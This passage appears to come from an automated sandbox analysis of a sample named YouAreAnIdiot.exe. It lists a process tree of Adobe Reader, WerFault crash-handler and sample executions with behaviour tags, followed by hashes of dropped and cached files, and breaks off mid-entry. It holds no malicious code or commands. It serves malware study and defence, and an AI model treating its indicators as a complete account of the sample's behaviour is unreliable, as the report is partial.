                                                                                                                                                                                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0F00E2CCBCF226F1FA8F82E97E399EB4 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                  PID:544
                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BFB5EE6BEFB578E8BB413B08344D8181 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BFB5EE6BEFB578E8BB413B08344D8181 --renderer-client-id=2 --mojo-platform-channel-handle=1768 --allow-no-sandbox-job /prefetch:1
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:1588
                                                                                                                                                                                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F9539A4C6F2CBD0CCEC880DF6EE913D3 --mojo-platform-channel-handle=2296 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:5412
                                                                                                                                                                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C2A70217AAB973DA67F1350D8AC0CE9E --mojo-platform-channel-handle=1964 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:5284
                                                                                                                                                                                                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FD16BDE8DFFE4479E8792FA45758DF4F --mojo-platform-channel-handle=2380 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:3828
                                                                                                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:3980
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1080 -ip 1080
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:4240
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4552 -ip 4552
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:5832
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1028 -ip 1028
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:3164
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2212 -ip 2212
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:2416
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5408 -ip 5408
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:840
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4380 -ip 4380
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:5672
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5540 -ip 5540
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:1884
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2868 -ip 2868
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:1464
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5760 -ip 5760
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:5272
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3136 -ip 3136
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:1124
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5660 -ip 5660
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:1496
                                                                                                                                                                                                                          • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:5924
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5924 -s 1172
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                              PID:996
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5924 -ip 5924
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:2008
                                                                                                                                                                                                                            • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                              PID:4192
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 1172
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                PID:5392
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4192 -ip 4192
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:4452
                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:2416
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2416 -s 1172
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                  PID:5328
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2416 -ip 2416
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:5336
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1224 -ip 1224
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:6132
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4284 -ip 4284
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:4192
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 5000 -ip 5000
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:1028
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2688 -ip 2688
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:5604
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2928 -ip 2928
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:4628
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3360 -ip 3360
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:5160
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5004 -ip 5004
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:1864
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 628 -ip 628
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:5624
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5480 -ip 5480
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:2432
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6124 -ip 6124
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:4892
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 4284 -ip 4284
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:1080
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 812 -ip 812
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:3596
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5752 -ip 5752
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:6340
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4296 -ip 4296
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:6912
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2456 -ip 2456
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:7052
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4240 -ip 4240
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:3476
                                                                                                                                                                                                                                                                • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                                                  "LogonUI.exe" /flags:0x4 /state0:0xa3fce855 /state1:0x41c64e6d
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                  PID:6764
                                                                                                                                                                                                                                                                • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                  C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:6820
                                                                                                                                                                                                                                                                  • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                    C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:6104
                                                                                                                                                                                                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                      C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:6404

                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YouAreAnIdiot.exe.log

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        17573558c4e714f606f997e5157afaac

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        13e16e9415ceef429aaf124139671ebeca09ed23

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        c18db6aecad2436da4a63ff26af4e3a337cca48f01c21b8db494fe5ccc60e553

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        f4edf13f05a0d142e4dd42802098c8c44988ee8869621a62c2b565a77c9a95857f636583ff8d6d9baa366603d98b9bfbf1fc75bc6f9f8f83c80cb1215b2941cc

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        152B

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        bffcefacce25cd03f3d5c9446ddb903d

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        8923f84aa86db316d2f5c122fe3874bbe26f3bab

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        152B

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        d22073dea53e79d9b824f27ac5e9813e

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        6d8a7281241248431a1571e6ddc55798b01fa961

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        20KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        a6f79c766b869e079daa91e038bff5c0

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        45a9a1e2a7898ed47fc3a2dc1d674ca87980451b

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        d27842b8823f69f4748bc26e91cf865eceb2a4ec60258cbca23899a9aef8c35a

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        ed56aaa8229e56142ffa5eb926e4cfa87ac2a500bfa70b93001d55b08922800fe267208f6bd580a16aed7021a56b56ae70dae868c7376a77b08f1c3c23d14ab7

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        37KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        fed3d674a2f247d846667fb6430e60a7

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        5983d3f704afd0c03e7858da2888fcc94b4454fb

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        001c91272600648126ab2fd51263117c17f14d1447a194b318394d8bb9b96c5d

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        f2b9d820ac40a113d1ab3ed152dfed87322318cd38ba25eb5c5e71107df955b37448ab14a2779b29fce7ebd49cc0bbafbd505748786bc00cd47c3a138aefdddc

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        37KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        1b6703b594119e2ef0f09a829876ae73

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        d324911ee56f7b031f0375192e4124b0b450395e

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        0a8d23eceec4035c56dcfea9505de12a3b222bac422d3de5c15148952fec38a0

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        62b38dd0c1cfb92daffd30d2961994aef66decf55a5c286f2274b725e72e990fa05cae0494dc6ad1565e4fbc88a6ddd9685bd6bc4da9100763ef268305f3afe2

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        19KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        7eab02c9122098646914e18bd7324a42

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        5e2044e849182f1d3c8bcf7aa91d413b970fc52f

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        d58d66c51a1feb9af55ba4a2dcf2c339b7976dd011fbd5d071ca86b9d7f58a42

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        dbb0f94de62d7d77d4bfe6c298043c559a0d4bc117bd7dc1d627caabffa8e712cec5e3adb4a737b350429493ac0ebfb81c8759aebed41b30218d0e7ff6f3196f

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        18KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        2e23d6e099f830cf0b14356b3c3443ce

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        027db4ff48118566db039d6b5f574a8ac73002bc

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        7238196a5bf79e1b83cacb9ed4a82bf40b32cd789c30ef790e4eac0bbf438885

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        165b1de091bfe0dd9deff0f8a3968268113d95edc9fd7a8081b525e0910f4442cfb3b4f5ac58ecfa41991d9dcabe5aa8b69f7f1c77e202cd17dd774931662717

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        59KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        02240241c502c60a601fea4d1ddf616c

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        654602ee1bbdcade5912f9b727473f592ddc3237

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        2c57c29f743821138afdd7d3e75f38f4b3912f60bb7a3c5e0170bd79adc1709a

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        8b135da031724d41b7ed6fc4e6b78568c915f900a9ad35f09f98cdffe58d0f1e611232b46c78c1fc0eec6acdbaff1822887e2cdfff2ffe6aa3f5fd897261b62e

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        17KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        89b14043a36def333f547e45b88b36be

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        7729f36422740316ae722cfe5b6e5fe3d731d021

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        e13e0d24952c346806b3c5bfda2626f51886baf807f96f58efc82a6d88b00e81

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        3489698d642de8232fff37b4e289110670dae623f98222dc4635ca0e6e4252911a7d499169dbd37cc8e9e777d0ce410ff7176c50e7b0dcfee8b2a67a429315fe

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        38KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        bf95b000a1f52c689cebc5fa260f201e

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        ebe21a68dd7d8321b540757f246ed6e10a18683a

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        0abded4712a9ab59e84a24ec40179ed475eded446a082584d22c2f7708db6c40

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        151752d4174ff487b3895535521e38071a729e7853b3b2605928b14350ff4106d2d73aae14f7c9a69843d417648a2dfcb9b295a254391c18d99f354c39e8c32b

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        99KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        b6b2fb3562093661d9091ba03cd38b7b

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        39f80671c735180266fa0845a4e4689b7d51e550

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        530eb1f6d30ce52b11c3844741721eed669decc69060854ddb6666012c6e9e20

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        7c3f88910bb87eb58078104290d0a6fc96bb34705974bf93e6dffd928160a9f28e34d879f015f0a05754f56aeacc462e27ba3f332e9dddd6e3879c5d97db5089

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

                                                                                                                                                                                                                                                                        Filesize

